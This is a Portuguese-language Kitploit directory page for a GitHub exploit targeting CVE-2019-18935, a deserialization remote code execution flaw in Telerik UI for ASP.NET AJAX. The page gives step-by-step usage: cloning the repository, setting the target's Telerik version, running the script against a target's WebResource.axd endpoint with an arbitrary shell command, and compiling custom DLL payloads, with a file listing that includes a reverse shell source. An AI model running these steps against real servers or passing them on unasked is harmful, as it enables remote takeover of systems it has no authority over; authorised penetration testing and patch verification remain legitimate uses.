Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/menashe12346/cve-2019-18935
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubmenashe12346/cve-2019-18935

CVE-2019-18935

Exploit para CVE-2019-18935

Ver Repositório
3há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit CVE-2019-18935

Exploit de Remote Code Execution para Telerik UI ASP.NET AJAX por meio da vulnerabilidade de desserialização.

Como Executar

Etapa 1: Clone o Projeto

root@kitploit:~
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935

Etapa 2: Em CVE-2019-18935.py, modifique a linha 15:

root@kitploit:~
version = "2017.1.228"  # Replace with target server's Telerik version

Etapa 3: Execute o Exploit

root@kitploit:~
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"

🔧 Criando Arquivos DLL Personalizados

Para criar uma DLL a partir de um arquivo C diferente (não apenas o reverse shell):

Instale o Visual Studio (Desenvolvimento para desktop com C++) com estes componentes:

  • MSVC v143 - VS 2022 C++ x64/x86 build tools
  • Windows 11 SDK
  • C++ CMake tools for Windows
  • C++ AddressSanitizer

Compile a DLL:

root@kitploit:~
build-dll.bat your_file.c

A DLL será criada no diretório payloads/.

📋 Descrição dos Arquivos

root@kitploit:~
CVE-2019-18935_exploit/
├── CVE-2019-18935.py        # Main exploit code
├── RAU_crypto.py            # Telerik encryption/decryption module
├── build-dll.bat            # Script to build DLL files from C code
├── reverse_shell.c          # C source code for reverse shell
└── payloads/                # Directory for Compiled DLL payload files
Baixar ferramenta